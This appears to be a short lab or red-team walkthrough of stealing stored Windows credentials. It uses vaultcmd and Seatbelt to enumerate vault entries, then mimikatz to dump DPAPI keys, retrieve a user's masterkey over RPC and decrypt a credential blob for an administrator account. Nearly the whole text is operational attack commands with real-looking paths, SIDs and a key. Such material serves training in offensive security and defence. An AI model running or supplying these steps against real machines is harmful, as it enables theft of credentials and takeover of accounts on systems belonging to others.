First let’s list the Credential Available in the vault.

run vaultcmd /list

Now let’s list the avilable credentials in the “Windows Credentials”

run vaultcmd /listcreds:"Windows Credentials" /all

notice that we have the SQL-2\Administrator.

we can use seatbelt for automation

execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

now let’s dump the DPAPI.

mimikatz !sekurlsa::dpapi

Now let’s dump the masterkey.

mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

and we got the key.

Finally We can decrypt the Credential Blob.

mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214